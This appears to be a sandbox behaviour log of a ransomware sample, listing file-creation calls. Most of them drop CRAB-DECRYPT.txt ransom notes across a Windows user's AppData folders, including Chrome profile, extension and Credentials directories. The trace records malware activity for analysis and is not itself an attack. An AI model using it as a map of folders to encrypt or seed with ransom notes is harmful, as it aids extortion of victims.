Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\EDB.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\EDB00006.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\EDBres00001.jrs desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\EDBres00002.jrs desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\EDBtmp.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\vedatamodel.edb desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\VirtualStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\data\AggregateCache.uca desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\store.vol desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\tmp.edb desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateTransparency\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\reports\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\settings.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CrashpadMetrics-active.pma desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\databases\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\databases\Databases.db desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\000003.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\000003.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\IndexedDB\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\IndexedDB\https_www.google.com_0.indexeddb.leveldb\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Extension Settings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\https_www.youtube.com_0.localstorage desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\previews_opt_out.db desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Service Worker\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Service Worker\CacheStorage\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Service Worker\Database\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Service Worker\Database\000003.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Service Worker\ScriptCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Session Storage\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Session Storage\000003.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Data\LevelDB\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Extension Settings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\_crx_aohghmighlieiainnegkcijnfilokake\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\EVWhitelist\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FileTypePolicies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrials\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\PepperFlash\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnacl\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Safe Browsing\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SSLErrorAssistant\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SwReporter\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\WidevineCdm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\CrashReports\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\History.IE5\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\History.IE5\MSHist012018031420180315\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\Low\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\Low\History.IE5\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v2.0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v2.0\UsageLogs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\UsageLogs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Credentials\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Event Viewer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
